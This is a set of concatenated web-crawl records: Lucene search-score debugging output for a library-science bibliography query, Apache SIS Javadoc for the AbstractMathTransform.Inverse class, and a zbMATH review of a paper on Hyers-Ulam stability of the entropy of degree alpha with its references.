maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.36 = coord(9/25)\n```\n4. Hady, M.F. 
Abdel; Shaker, A.K.: Cataloging and classification education in Egypt : stressing the fundamentals while approaching toward automated applications (2005) 0.33\n```0.33065537 = sum of:\n0.33065537 = product of:\n0.91848713 = sum of:\n0.033644173 = weight(abstract_txt:years in 1221) [ClassicSimilarity], result of:\n0.033644173 = score(doc=1221,freq=1.0), product of:\n0.09140003 = queryWeight, product of:\n1.0168821 = boost\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.019076655 = queryNorm\n0.36809805 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.059283555 = weight(abstract_txt:five in 1221) [ClassicSimilarity], result of:\n0.059283555 = score(doc=1221,freq=1.0), product of:\n0.13334066 = queryWeight, product of:\n1.2282273 = boost\n5.690909 = idf(docFreq=396, maxDocs=43254)\n0.019076655 = queryNorm\n0.44460225 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.690909 = idf(docFreq=396, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.029400595 = weight(abstract_txt:library in 1221) [ClassicSimilarity], result of:\n0.029400595 = score(doc=1221,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.35192135 = fieldWeight in 1221, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.1444758 = weight(abstract_txt:courses in 1221) [ClassicSimilarity], result of:\n0.1444758 = score(doc=1221,freq=2.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.7538217 = fieldWeight in 1221, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.14710645 = weight(abstract_txt:curricula in 1221) [ClassicSimilarity], result of:\n0.14710645 = score(doc=1221,freq=1.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.6019182 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.03792717 = weight(abstract_txt:science in 1221) [ClassicSimilarity], result of:\n0.03792717 = score(doc=1221,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 1221, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.08221436 = weight(abstract_txt:classification in 1221) [ClassicSimilarity], result of:\n0.08221436 = score(doc=1221,freq=4.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.6246731 = fieldWeight in 1221, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.2093117 = weight(abstract_txt:cataloging in 1221) [ClassicSimilarity], result of:\n0.2093117 = score(doc=1221,freq=7.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = 
idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n1.0278919 = fieldWeight in 1221, product of:\n2.6457512 = tf(freq=7.0), with freq of:\n7.0 = termFreq=7.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.17512327 = weight(abstract_txt:education in 1221) [ClassicSimilarity], result of:\n0.17512327 = score(doc=1221,freq=4.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.80374485 = fieldWeight in 1221, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=1221)\n0.36 = coord(9/25)\n```\n```0.32367605 = sum of:\n0.32367605 = product of:\n0.89910007 = sum of:\n0.062847175 = weight(abstract_txt:teaching in 3445) [ClassicSimilarity], result of:\n0.062847175 = score(doc=3445,freq=1.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.45333806 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.075985506 = weight(abstract_txt:analyzes in 3445) [ClassicSimilarity], result of:\n0.075985506 = score(doc=3445,freq=1.0), product of:\n0.15733558 = queryWeight, product of:\n1.3341691 = boost\n6.1817837 = idf(docFreq=242, maxDocs=43254)\n0.019076655 = queryNorm\n0.48295185 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.1817837 = idf(docFreq=242, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.029400595 = weight(abstract_txt:library in 3445) [ClassicSimilarity], result of:\n0.029400595 = score(doc=3445,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.35192135 = fieldWeight in 3445, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.176946 = weight(abstract_txt:courses in 3445) [ClassicSimilarity], result of:\n0.176946 = score(doc=3445,freq=3.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.92323923 = fieldWeight in 3445, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.14710645 = weight(abstract_txt:curricula in 3445) [ClassicSimilarity], result of:\n0.14710645 = score(doc=3445,freq=1.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.6019182 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.03792717 = weight(abstract_txt:science in 3445) [ClassicSimilarity], result of:\n0.03792717 = score(doc=3445,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.07911239 = weight(abstract_txt:cataloging in 3445) [ClassicSimilarity], result of:\n0.07911239 = 
score(doc=3445,freq=1.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n0.38850662 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.15166122 = weight(abstract_txt:education in 3445) [ClassicSimilarity], result of:\n0.15166122 = score(doc=3445,freq=3.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.6960635 = fieldWeight in 3445, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.13811357 = weight(abstract_txt:programs in 3445) [ClassicSimilarity], result of:\n0.13811357 = score(doc=3445,freq=1.0), product of:\n0.29523918 = queryWeight, product of:\n2.5846362 = boost\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.019076655 = queryNorm\n0.46780232 = fieldWeight in 3445, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.078125 = fieldNorm(doc=3445)\n0.36 = coord(9/25)\n```" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.6872541,"math_prob":0.99860543,"size":22566,"snap":"2021-31-2021-39","text_gpt3_token_len":8616,"char_repetition_ratio":0.25197235,"word_repetition_ratio":0.53538346,"special_character_ratio":0.53554016,"punctuation_ratio":0.28317901,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9998996,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-27T12:44:21Z\",\"WARC-Record-ID\":\"<urn:uuid:3ba0fd09-3b18-4aff-8fa3-d2fe8f55d08e>\",\"Content-Length\":\"35229\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:e344e375-2a66-4f53-92a6-975225d2fe2d>\",\"WARC-Concurrent-To\":\"<urn:uuid:2b33a368-f186-41a5-b07e-97f01d776983>\",\"WARC-IP-Address\":\"139.6.160.6\",\"WARC-Target-URI\":\"https://ixtrieve.fh-koeln.de/birds/litie/document/12614\",\"WARC-Payload-Digest\":\"sha1:DRIKFTYFD5L3OBXOXKNEKD3DESRBEESQ\",\"WARC-Block-Digest\":\"sha1:MTBMJVKSK7YSU6NV6VX73XFMMZJU6TR5\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780058450.44_warc_CC-MAIN-20210927120736-20210927150736-00499.warc.gz\"}"}
https://sis.apache.org/apidocs/org/apache/sis/referencing/operation/transform/AbstractMathTransform.Inverse.html
[ "# Class AbstractMathTransform.Inverse\n\nAll Implemented Interfaces:\n`Parameterized`, `Lenient­Comparable`, `Math­Transform`\nDirect Known Subclasses:\n`Abstract­Math­Transform1D​.Inverse`, `Abstract­Math­Transform2D​.Inverse`\nEnclosing class:\nAbstractMathTransform\n\nprotected abstract static class AbstractMathTransform.Inverse extends AbstractMathTransform\nBase class for implementations of inverse math transforms. Subclasses need to implement the `inverse()` method.\n\n## Serialization\n\nThis object may or may not be serializable, at implementation choices. Most Apache SIS implementations are serializable, but the serialized objects are not guaranteed to be compatible with future SIS versions. Serialization should be used only for short term storage or RMI between applications running the same SIS version.\nSince:\n0.5\n\nDefined in the `sis-referencing` module\n\n## Nested classes/interfaces inherited from class AbstractMathTransform\n\n`Abstract­Math­Transform​.Inverse`\n• ## Constructor Summary\n\nConstructors\nModifier\nConstructor\nDescription\n`protected `\n`Inverse()`\nConstructs an inverse math transform.\n• ## Method Summary\n\nModifier and Type\nMethod\nDescription\n`protected int`\n`compute­Hash­Code()`\nComputes a hash value for this transform.\n`Matrix`\n`derivative(Direct­Position point)`\nGets the derivative of this transform at a point.\n`boolean`\n```equals(Object object, Comparison­Mode mode)```\nCompares the specified object with this inverse math transform for equality.\n`protected String`\n`format­To(Formatter formatter)`\nFormats the inner part of a Well Known Text version 1 (WKT 1) element.\n`int`\n`get­Source­Dimensions()`\nGets the dimension of input points.\n`int`\n`get­Target­Dimensions()`\nGets the dimension of output points.\n`abstract Math­Transform`\n`inverse()`\nReturns the inverse of this math transform.\n`boolean`\n`is­Identity()`\nTests whether this transform does not move any points.\n\n### Methods inherited from class AbstractMathTransform\n\n`equals, get­Contextual­Parameters, get­Parameter­Descriptors, get­Parameter­Values, hash­Code, transform, transform, transform, transform, transform, transform, try­Concatenate`\n\n### Methods inherited from class FormattableObject\n\n`print, to­String, to­String, to­WKT`\n\n### Methods inherited from class Object\n\n`clone, finalize, get­Class, notify, notify­All, wait, wait, wait`\n\n### Methods inherited from interface MathTransform\n\n`to­WKT`\n• ## Constructor Details\n\n• ### Inverse\n\nprotected Inverse()\nConstructs an inverse math transform.\n• ## Method Details\n\n• ### getSourceDimensions\n\npublic int getSourceDimensions()\nGets the dimension of input points. The default implementation returns the dimension of output points of the inverse math transform.\nSpecified by:\n`get­Source­Dimensions` in interface `Math­Transform`\nSpecified by:\n`get­Source­Dimensions` in class `Abstract­Math­Transform`\nReturns:\nthe dimension of input points.\n• ### getTargetDimensions\n\npublic int getTargetDimensions()\nGets the dimension of output points. The default implementation returns the dimension of input points of the inverse math transform.\nSpecified by:\n`get­Target­Dimensions` in interface `Math­Transform`\nSpecified by:\n`get­Target­Dimensions` in class `Abstract­Math­Transform`\nReturns:\nthe dimension of output points.\n• ### derivative\n\npublic Matrix derivative(DirectPosition point) throws TransformException\nGets the derivative of this transform at a point. 
The default implementation computes the inverse of the matrix returned by the inverse math transform.\nSpecified by:\n`derivative` in interface `Math­Transform`\nOverrides:\n`derivative` in class `Abstract­Math­Transform`\nParameters:\n`point` - the coordinate point where to evaluate the derivative.\nReturns:\nthe derivative at the specified point (never `null`).\nThrows:\n`Null­Pointer­Exception` - if the derivative depends on coordinate and `point` is `null`.\n`Mismatched­Dimension­Exception` - if `point` does not have the expected dimension.\n`Transform­Exception` - if the derivative can not be evaluated at the specified point.\n• ### inverse\n\npublic abstract MathTransform inverse()\nReturns the inverse of this math transform. The returned transform should be the enclosing math transform.\nSpecified by:\n`inverse` in interface `Math­Transform`\nOverrides:\n`inverse` in class `Abstract­Math­Transform`\nReturns:\nthe inverse of this transform.\n• ### isIdentity\n\npublic boolean isIdentity()\nTests whether this transform does not move any points. The default implementation delegates this tests to the inverse math transform.\nSpecified by:\n`is­Identity` in interface `Math­Transform`\nOverrides:\n`is­Identity` in class `Abstract­Math­Transform`\nReturns:\n• ### computeHashCode\n\nprotected int computeHashCode()\nComputes a hash value for this transform. This method is invoked by `Abstract­Math­Transform​.hash­Code()` when first needed.\nOverrides:\n`compute­Hash­Code` in class `Abstract­Math­Transform`\nReturns:\nthe hash code value. This value may change between different execution of the Apache SIS library.\n• ### equals\n\npublic boolean equals(Object object, ComparisonMode mode)\nCompares the specified object with this inverse math transform for equality. The default implementation tests if `object` in an instance of the same class than `this`, and if so compares their inverse `Math­Transform`.\nSpecified by:\n`equals` in interface `Lenient­Comparable`\nOverrides:\n`equals` in class `Abstract­Math­Transform`\nParameters:\n`object` - the object to compare with this transform.\n`mode` - the strictness level of the comparison. Default to `STRICT`.\nReturns:\n`true` if the given object is considered equals to this math transform.\nFormats the inner part of a Well Known Text version 1 (WKT 1) element. If this inverse math transform has any parameter values, then this method formats the WKT as in the super-class method. Otherwise this method formats the math transform as an `\"Inverse_MT\"` entity.\nCompatibility note: `Param_MT` and `Inverse_MT` are defined in the WKT 1 specification only.\n`format­To` in class `Abstract­Math­Transform`\n`formatter` - the formatter to use.\nthe WKT element name, which is `\"Param_MT\"` or `\"Inverse_MT\"` in the default implementation." ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.57643133,"math_prob":0.7457347,"size":5845,"snap":"2021-43-2021-49","text_gpt3_token_len":1194,"char_repetition_ratio":0.19568567,"word_repetition_ratio":0.13422818,"special_character_ratio":0.17040205,"punctuation_ratio":0.14472124,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.96341956,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-12-06T16:52:37Z\",\"WARC-Record-ID\":\"<urn:uuid:6d8cbe56-1de1-4037-9daf-392178648016>\",\"Content-Length\":\"35135\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:cadfa3c7-6aa5-49fb-b8af-f1d90027b623>\",\"WARC-Concurrent-To\":\"<urn:uuid:9b7feb55-5d8e-400a-a871-d6c38c2b6654>\",\"WARC-IP-Address\":\"151.101.2.132\",\"WARC-Target-URI\":\"https://sis.apache.org/apidocs/org/apache/sis/referencing/operation/transform/AbstractMathTransform.Inverse.html\",\"WARC-Payload-Digest\":\"sha1:4CSRVMMZ6CWGRRPDAJSXWEQNFA533RN2\",\"WARC-Block-Digest\":\"sha1:PHEAZ3FIWV7M5NPHPGNWRO7Q7FVXNHSB\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-49/CC-MAIN-2021-49_segments_1637964363309.86_warc_CC-MAIN-20211206163944-20211206193944-00203.warc.gz\"}"}
https://metanumbers.com/60254
[ "# 60254 (number)\n\n60,254 (sixty thousand two hundred fifty-four) is an even five-digits composite number following 60253 and preceding 60255. In scientific notation, it is written as 6.0254 × 104. The sum of its digits is 17. It has a total of 3 prime factors and 8 positive divisors. There are 29,440 positive integers (up to 60254) that are relatively prime to 60254.\n\n## Basic properties\n\n• Is Prime? No\n• Number parity Even\n• Number length 5\n• Sum of Digits 17\n• Digital Root 8\n\n## Name\n\nShort name 60 thousand 254 sixty thousand two hundred fifty-four\n\n## Notation\n\nScientific notation 6.0254 × 104 60.254 × 103\n\n## Prime Factorization of 60254\n\nPrime Factorization 2 × 47 × 641\n\nComposite number\nDistinct Factors Total Factors Radical ω(n) 3 Total number of distinct prime factors Ω(n) 3 Total number of prime factors rad(n) 60254 Product of the distinct prime numbers λ(n) -1 Returns the parity of Ω(n), such that λ(n) = (-1)Ω(n) μ(n) -1 Returns: 1, if n has an even number of prime factors (and is square free) −1, if n has an odd number of prime factors (and is square free) 0, if n has a squared prime factor Λ(n) 0 Returns log(p) if n is a power pk of any prime p (for any k >= 1), else returns 0\n\nThe prime factorization of 60,254 is 2 × 47 × 641. Since it has a total of 3 prime factors, 60,254 is a composite number.\n\n## Divisors of 60254\n\n1, 2, 47, 94, 641, 1282, 30127, 60254\n\n8 divisors\n\n Even divisors 4 4 2 2\nTotal Divisors Sum of Divisors Aliquot Sum τ(n) 8 Total number of the positive divisors of n σ(n) 92448 Sum of all the positive divisors of n s(n) 32194 Sum of the proper positive divisors of n A(n) 11556 Returns the sum of divisors (σ(n)) divided by the total number of divisors (τ(n)) G(n) 245.467 Returns the nth root of the product of n divisors H(n) 5.21409 Returns the total number of divisors (τ(n)) divided by the sum of the reciprocal of each divisors\n\nThe number 60,254 can be divided by 8 positive divisors (out of which 4 are even, and 4 are odd). The sum of these divisors (counting 60,254) is 92,448, the average is 11,556.\n\n## Other Arithmetic Functions (n = 60254)\n\n1 φ(n) n\nEuler Totient Carmichael Lambda Prime Pi φ(n) 29440 Total number of positive integers not greater than n that are coprime to n λ(n) 14720 Smallest positive number such that aλ(n) ≡ 1 (mod n) for all a coprime to n π(n) ≈ 6066 Total number of primes less than or equal to n r2(n) 0 The number of ways n can be represented as the sum of 2 squares\n\nThere are 29,440 positive integers (less than 60,254) that are coprime with 60,254. 
And there are approximately 6,066 prime numbers less than or equal to 60,254.\n\n## Divisibility of 60254\n\n m 2 3 4 5 6 7 8 9\n n mod m 0 2 2 4 2 5 6 8\n\nThe number 60,254 is divisible by 2.\n\n• Arithmetic\n• Deficient\n\n• Polite\n\n• Square Free\n\n• Sphenic\n\n## Base conversion (60254)\n\nBase System Value\n2 Binary 1110101101011110\n3 Ternary 10001122122\n4 Quaternary 32231132\n5 Quinary 3412004\n6 Senary 1142542\n8 Octal 165536\n10 Decimal 60254\n12 Duodecimal 2aa52\n20 Vigesimal 7ace\n36 Base36 1ahq\n\n## Basic calculations (n = 60254)\n\n### Multiplication\n\nn×y\n n×2 120508 | n×3 180762 | n×4 241016 | n×5 301270\n\n### Division\n\nn÷y\n n÷2 30127 | n÷3 20084.7 | n÷4 15063.5 | n÷5 12050.8\n\n### Exponentiation\n\nn^y\n n^2 3630544516 | n^3 218754829267064 | n^4 13180853482657674256 | n^5 794199145744055504621024\n\n### Nth Root\n\ny√n\n 2√n 245.467 | 3√n 39.2038 | 4√n 15.6674 | 5√n 9.03644\n\n## 60254 as geometric shapes\n\n### Circle\n\n Diameter 120508 | Circumference 378587 | Area 1.14057e+10\n\n### Sphere\n\n Volume 9.16318e+14 | Surface area 4.56228e+10 | Circumference 378587\n\n### Square\n\nLength = n\n Perimeter 241016 | Area 3.63054e+09 | Diagonal 85212\n\n### Cube\n\nLength = n\n Surface area 2.17833e+10 | Volume 2.18755e+14 | Space diagonal 104363\n\n### Equilateral Triangle\n\nLength = n\n Perimeter 180762 | Area 1.57207e+09 | Height 52181.5\n\n### Triangular Pyramid\n\nLength = n\n Surface area 6.28829e+09 | Volume 2.57805e+13 | Height 49197.2" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.60354114,"math_prob":0.9906575,"size":4541,"snap":"2021-43-2021-49","text_gpt3_token_len":1615,"char_repetition_ratio":0.11924179,"word_repetition_ratio":0.028148148,"special_character_ratio":0.4523233,"punctuation_ratio":0.07483871,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9986542,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-10-21T16:49:09Z\",\"WARC-Record-ID\":\"<urn:uuid:97653853-9124-43eb-bb11-b0407118382e>\",\"Content-Length\":\"39924\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:8c1d0756-ac58-443e-934b-ea3532423143>\",\"WARC-Concurrent-To\":\"<urn:uuid:eba612e5-70fa-47a1-b8b0-f2efbbc1c980>\",\"WARC-IP-Address\":\"46.105.53.190\",\"WARC-Target-URI\":\"https://metanumbers.com/60254\",\"WARC-Payload-Digest\":\"sha1:F33JH3ZFZ22VWONVAUQR2AUELUOQXM4I\",\"WARC-Block-Digest\":\"sha1:3T7OQFWKR27NE2FWPXTDEGJ3IWKIAZ3L\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-43/CC-MAIN-2021-43_segments_1634323585439.59_warc_CC-MAIN-20211021164535-20211021194535-00224.warc.gz\"}"}
https://lsbr.niams.nih.gov/bsoft/model/bsoft_poly.html
[ "## Polyhedra\n\nA polyhedral model is composed of components (usually called vertices) and links (also called edges), but also has polygons formed by rings of links, and usually has specific rules for vertex or polygon valency. The following list defines specific types of polyhedra and polyhedral concepts:\n\n• A polyhedron typically has a fixed vertex valency, or a fixed polygon order.\n• The dual of a polyhedron switches the locations of vertices with polygons, such that a polyhedron with fixed valency becomes a polygon with fixed polygon order.\n• A deltagraph is a polyhedron with triangular polygons.\n• A fullerene is a polyhedron with trivalent vertices, 12 pentagons and a variable number of hexagons.\n• A polygon is considered closed when it either has the same valency for all vertices, or the same order for all polygons.\n\nThe easiest way to visualize polyhedra is using UCSF Chimera and converting the model to the Chimera marker model format (cmm):\n\nThe options for specifying the component and link radii may be necessary to produce reasonable display sizes for these elements.\n\n## Generating polyhedra\n\nBsoft offers various ways to generate polyhedra (e.g., Heymann et al., 2008).\n\n### Cylindrical algorithm\n\nA cylindrical polygon can be a tube that is open at the ends, or closed with a specific cap type. The pentagonal type adds a semi-icosahedral cap to each end, while the hexagonal type adds a six-fold cap at each end. First, a deltagraph is generated as a cylinder with flat ends:\n\nIt is then converted to its dual to give a fullerene:\n\nbpoly -verb 1 -dual -out loz_dual.cmm loz.cmm\n\nThis is still distorted and has to be regularized:\n\nbpoly -verb 1 -reg 10000 -linklen 1 -Klink 0.1 -Kpolyangle 0.01 -Kpolyplane 0.0001 -out loz_reg.cmm loz_dual.cmm\n\nThe pentagons can then be highlighted by color:\n\nbmodcol -verb 1 -polygons 5 -color 0,0,1,0 -out loz_reg_col.cmm loz_reg.cmm", null, "### Spiral algorithm\n\nAlmost any closed polyhedron can be built from a linear sequence of polygons, assembled in a manner where succesive polygons form a spiral on the polyhedral surface. This linear sequence of polygons can be encoded as a simple sequence of numbers relating the polygon orders. In the case the fullerenes, there are always 12 pentagons and a variable number of hexagons. The spiral algorithm simply generates all permutations of a specified length sequence of 5's and 6's, attempts to generate a closed polyhedron from each sequence, and keeping those closed polyhedra as output models. A comprehensive enumeration of fullerenes with a specific number of vertices can be generated:\n\nbspiral -verb 1 -vert 36 36.star\n\nThis gives 15 closed polyhedra out of a possible 125970 permutations of the 20-polygon sequence.\n\n(Note: A fullerene with n vertices always has 12 pentagons and (n-20)/2 hexagons)" ]
[ null, "https://lsbr.niams.nih.gov/bsoft/model/loz_reg_cols.png", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8521347,"math_prob":0.9722502,"size":2923,"snap":"2020-34-2020-40","text_gpt3_token_len":753,"char_repetition_ratio":0.13532032,"word_repetition_ratio":0.017021276,"special_character_ratio":0.22511119,"punctuation_ratio":0.10971223,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9743796,"pos_list":[0,1,2],"im_url_duplicate_count":[null,2,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-09-28T09:56:48Z\",\"WARC-Record-ID\":\"<urn:uuid:fbdaef55-22b0-4386-b408-7268eabad193>\",\"Content-Length\":\"4427\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:1899ec99-a58c-433e-85a7-a2fd538b277a>\",\"WARC-Concurrent-To\":\"<urn:uuid:1ff1ddbe-7db9-46b9-ad03-a7d9c109a2f2>\",\"WARC-IP-Address\":\"137.187.246.165\",\"WARC-Target-URI\":\"https://lsbr.niams.nih.gov/bsoft/model/bsoft_poly.html\",\"WARC-Payload-Digest\":\"sha1:2TAZDH3PCFUYUDMQ7QZ5S27KLMZYZFSG\",\"WARC-Block-Digest\":\"sha1:IRAIAWCS3R2XV4OV3K6F2WASMGPR6XEM\",\"WARC-Identified-Payload-Type\":\"application/xhtml+xml\",\"warc_filename\":\"/cc_download/warc_2020/CC-MAIN-2020-40/CC-MAIN-2020-40_segments_1600401598891.71_warc_CC-MAIN-20200928073028-20200928103028-00358.warc.gz\"}"}
https://www.zbmath.org/?q=an%3A1149.39024
[ "# zbMATH — the first resource for mathematics\n\nThe stability of the entropy of degree alpha. (English) Zbl 1149.39024\nThe functional equation $g(x)+(1-x)^{\\alpha}g\\left(\\frac{y}{1-x}\\right)=g(y)+(1-y)^{\\alpha}g \\left(\\frac{x}{1-y}\\right)\\tag{1}$ with unknown mapping $$g:[0,1]\\to\\mathbb R$$ and with $$\\alpha=1$$ is known as a fundamental equation of information. For $$0<\\alpha\\neq 1$$ it has been considered by Z. Daróczy [Inf. Control 16, 36–51 (1970; Zbl 0205.46901)]. In the present paper, the author proves the Hyers-Ulam stability of the equation (1) (for $$\\alpha\\neq 1$$) and generalizes the result of Daróczy. Then, the stability of (1) is applied in the proof of the stability of some system of functional equations characterizing the entropy of degree alpha (Havrda-Charvát or Tsallis entropy). Some open problems are posed, in particular the one concerning the stability of equation (1) for $$\\alpha=1$$.\n\n##### MSC:\n 39B82 Stability, separation, extension, and related topics for functional equations 94A17 Measures of information, entropy 39B72 Systems of functional equations and inequalities\nFull Text:\n##### References:\n Aczél, J.; Daróczy, Z., On measures of information and their characterizations, (1975), Academic Press New York, San Francisco · Zbl 0345.94022 Daróczy, Z., Generalized information functions, Inform. and control, 16, 36-51, (1970) · Zbl 0205.46901 Ebanks, B.; Sahoo, P.; Sander, W., Characterizations of information measures, (1998), Word Scientific Publishing Co. Inc. River Edge, NJ Forti, G.L., Hyers – ulam stability of functional equations in several variables, Aequationes math., 50, 1-2, 143-190, (1995) · Zbl 0836.39007 R. Ger, A survey of recent results on stability of functional equations, in: Proceedings of the 4th International Conference on Functional Equations and Inequalities, Pedagogical University in Cracow, 1994, pp. 5-36 Havrda, J.; Charvát, F., Quantification method of classification processes. concept of structural α-entropy, Kybernetika, 3, 30-35, (1967) · Zbl 0178.22401 Hyers, D.H., On the stability of the linear functional equations, Proc. nat. acad. sci. USA, 27, 222-224, (1941) · Zbl 0061.26403 Maksa, Gy., Solution on the open triangle of the generalized fundamental equation of information with four unknown functions, Util. math., 21, 267-282, (1982) · Zbl 0497.94003 Maksa, Gy.; Ng, C.T., The fundamental equation of information on open domain, Publ. math. debrecen, 33, 1-2, 9-11, (1986) · Zbl 0618.94004 Morando, A., A stability result concerning Shannon entropy, Aequationes math., 62, 286-296, (2001) · Zbl 0991.39021 Moszner, Z., Sur LES définitions différentes de la stabilitédes équation fonctionelles, Aequationes math., 68, 260-274, (2004) Shannon, C.E., A mathematical theory of communication, Bell system tech. J., 27, 379-423, (1948), and 623-656 · Zbl 1154.94303 Székelyhidi, L., 38. problem, Aequationes math., 41, 302, (1991) Tsallis, C., Possible generalization of boltzmann – gibbs statistics, J. stat phys., 52, 1-2, 479-487, (1988) · Zbl 1082.82501 Ulam, S.M.; Ulam, S.M., Problems in modern mathematics, 